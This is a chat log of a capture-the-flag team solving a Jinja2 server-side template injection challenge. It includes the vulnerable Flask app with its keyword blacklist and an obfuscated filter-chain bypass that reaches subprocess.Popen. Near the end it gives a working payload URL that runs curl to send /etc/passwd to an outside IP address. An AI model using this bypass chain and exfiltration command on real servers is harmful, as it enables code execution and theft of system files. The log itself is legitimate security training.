Project Sekai - ✅-web-pipe-your-way

Pipe your way - 500 points

Category: Web Description: > An awesome reward is waiting for you at the exit. Author : Djallil/djilousp Files:

https://ctf.gdgalgiers.com/files/2a2a205ce7419367806a3ce9297e33bd/app.py?token=eyJ1c2VyX2lkIjo0MzksInRlYW1faWQiOjE3NSwiZmlsZV9pZCI6OTV9.Y0G61g.9ztUztVhyKB1N8isFC9G5PYk92Y

Tags: No tags.

Sutx pinned a message to this channel. 10/08/2022 11:00 AM

@crazyman ai wants to collaborate

11:04

@jayden wants to collaborate

@strellic wants to collaborate

why this looks like a jail chall

13:00

oh nvm maybe Template injection or sth

13:01

The only source if anyone doesnt wanna dl

from pickle import FALSE
from flask import Flask, request,render_template
from jinja2 import Template

app = Flask(__name__)


@app.route('/')
def home():
    return render_template('./index.html')

@app.route( '/follow_the_light', methods=['GET'])
def F0LL0WM3():
    the_light = request.args.get("input", None)
    if the_light is None:
        return "It's just a white screen keep trying....."
    else:
        for _ in the_light:
            if any(x in the_light for x in {'.','_','|join', '[', ']', 'mro', 'base','import','builtins','attr','request','application','getitem','render_template'}):
                return "NOICE TRY"
            else:
                return Template("Your input: " + the_light).render()
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=3000)

@zwx风信 wants to collaborate

any progress here ?

not yet

everything looking useful to payload is banned (edited)

actually yeah

@22sh wants to collaborate

ssti

found a bypass for underscores

This is the only one out of 3 new webs with solves

also how is underscore bypassed

https://jinja.palletsprojects.com/en/3.1.x/templates/#list-of-builtin-filters anyone? this is a hint so i think solvable from this

17:57

also whats the payload if there's no ban?

@22sh do you know about it?

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---filter-bypass

18:23

filter bypass

18:26

it still has "application"

sahuang

https://jinja.palletsprojects.com/en/3.1.x/templates/#list-of-builtin-filters anyone? this is a hint so i think solvable from this

i will try read this a bit since its the direction

@Violin wants to collaborate

We need a few (maybe 3-4) builtin filters from the list to chain a long payload

@Zafirr wants to collaborate

|join on the blacklist can be bypassed with | join

but we need like 3-4 filters lul

https://forum.hackthebox.com/t/jinja2-ssti-filter-bypass-help-needed/3482/9

Jinja2 SSTI - Filter Bypass help needed

Have you tried using alternative parentheses? Like e.g. the UTF-8 full-width characters? Maybe the filter is somewhere in front and Jinja gracefully converts them back, for you. os.system（‘id’） aka. os.system%uff08'id'%uff09

21:49

maybe this for bracket

sahuang

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---filter-bypass

this has a lot of bypasses

https://www.compart.com/en/unicode/U+FF3B

Find all Unicode Characters from Hieroglyphs to Dingbats – Unicode ...

U+FF3B is the unicode hex value of the character Fullwidth Left Square Bracket. Char U+FF3B, Encodings, HTML Entitys:［,［, UTF-8 (hex), UTF-16 (hex), UTF-32 (hex)

sahuang

https://jinja.palletsprojects.com/en/3.1.x/templates/#list-of-builtin-filters anyone? this is a hint so i think solvable from this

but i got hint that pretty sure using 3-4 here can solve (maybe there are other solutions, im looking)

yeah but no dot bypass (edited)

21:50

and dot bypass i found needs brackets

true

ok doesnt work

21:52

oh wait

21:57

yeah it doesnt work, internal server error

{{"sdfs"|map("\x61ttr","\x5f\x5fclass\x5f\x5f")|first}} (edited)

21:57

does "sdfs".__class__

neat

21:58

so just chain from there?

sahuang

|join on the blacklist can be bypassed with | join

i feel this will def help somewhere imokay

i mean why they use |join not join

current progress

22:08

http://pipe-your-way.chal.ctf.gdgalgiers.com/follow_the_light?input={{%22sdfs%22|map(%22\x61ttr%22,%22\x5f\x5fclass\x5f\x5f%22)|map(%22\x61ttr%22,%22\x5f\x5fmr\x6f\x5f\x5f%22)|list|map(%22last%22)|map(%22\x61ttr%22,%22\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f%22)|list}}

(edited)

2

damn i failed to interpret this

22:13

ah ok it bypassed blacklist and returns empty list

check source

Your input: <class 'subprocess.Popen'>

2

22:23

man

22:47

i dont think this machine has outbound connection

22:47

cringe

whats the payload to get popen? we cant just run cat flag?

i dont have output

22:49

view-source:http://pipe-your-way.chal.ctf.gdgalgiers.com/follow_the_light?input={% set z = "curl 3354495921:1234 -F=@/etc/passwd" |list|slice(1)|list|map("join")|map("\x61ttr", "split")|first()()%}{{"sdfs"|map("\x61ttr","\x5f\x5fclass\x5f\x5f")|map("\x61ttr","\x5f\x5fmr\x6f\x5f\x5f")|list|map("last")|map("\x61ttr","\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")|list|first()()|slice(1)|list|map("\x61ttr", "\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")|list|first()(224)(z)}}

(edited)

strellic

Your input: <class 'subprocess.Popen'>

hm how did you get this?